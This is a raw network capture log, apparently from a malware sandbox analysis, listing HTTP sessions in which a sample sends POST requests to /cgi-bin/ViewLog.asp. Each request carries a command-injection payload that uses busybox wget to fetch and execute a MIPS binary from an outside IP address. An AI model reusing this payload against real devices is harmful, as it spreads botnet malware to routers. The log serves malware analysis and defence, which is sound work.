                                              Nov 23, 2023 05:15:26.246630907 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.062536955 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4192.168.2.134968631.136.127.2198080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:51.003494978 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:51.590840101 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:52.742719889 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:55.014727116 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:59.622714043 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:08.838685036 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:28.294631958 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:05.158631086 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5192.168.2.135748431.200.60.868080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:51.886919022 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6192.168.2.135744694.121.21.878080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:51.913736105 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7192.168.2.134750894.142.130.308080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.250962973 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:52.353924036 CET1314INHTTP/1.1 400 Bad Request
                                              Server: squid/6.0.0-20220501-re899e0c27
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 04:14:52 GMT
                                              Content-Type: text/html;charset=utf-8
                                              Content-Length: 3572
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Vary: Accept-Language
                                              Content-Language: en
                                              Cache-Status: ezproxies.com
                                              Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8192.168.2.134574894.107.42.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.343636990 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:52.934716940 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              9192.168.2.133913295.175.118.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.344311953 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:53.382728100 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:54.566741943 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:14:54.761827946 CET419INHTTP/1.1 415 Unsupported Media Type
                                              content-type: application/json; charset=utf-8
                                              content-length: 161
                                              Date: Thu, 23 Nov 2023 04:14:54 GMT
                                              Connection: keep-alive
                                              Keep-Alive: timeout=72
                                              Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 31 35 2c 22 63 6f 64 65 22 3a 22 46 53 54 5f 45 52 52 5f 43 54 50 5f 49 4e 56 41 4c 49 44 5f 4d 45 44 49 41 5f 54 59 50 45 22 2c 22 65 72 72 6f 72 22 3a 22 55 6e 73 75 70 70 6f 72 74 65 64 20 4d 65 64 69 61 20 54 79 70 65 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 55 6e 73 75 70 70 6f 72 74 65 64 20 4d 65 64 69 61 20 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 77 77 77 2d 66 6f 72 6d 2d 75 72 6c 65 6e 63 6f 64 65 64 22 7d
                                              Data Ascii: {"statusCode":415,"code":"FST_ERR_CTP_INVALID_MEDIA_TYPE","error":"Unsupported Media Type","message":"Unsupported Media Type: application/x-www-form-urlencoded"}
                                              Nov 23, 2023 05:14:54.762171030 CET211INHTTP/1.1 400 Bad Request
                                              Content-Length: 65
                                              Content-Type: application/json
                                              Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 42 61 64 20 52 65 71 75 65 73 74 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 6c 69 65 6e 74 20 45 72 72 6f 72 22 2c 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 30 7d
                                              Data Ascii: {"error":"Bad Request","message":"Client Error","statusCode":400}


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              10192.168.2.134138231.200.121.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.370002985 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11192.168.2.134535894.122.23.1668080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:52.371428967 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              12192.168.2.134000294.120.6.758080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:14:58.802897930 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
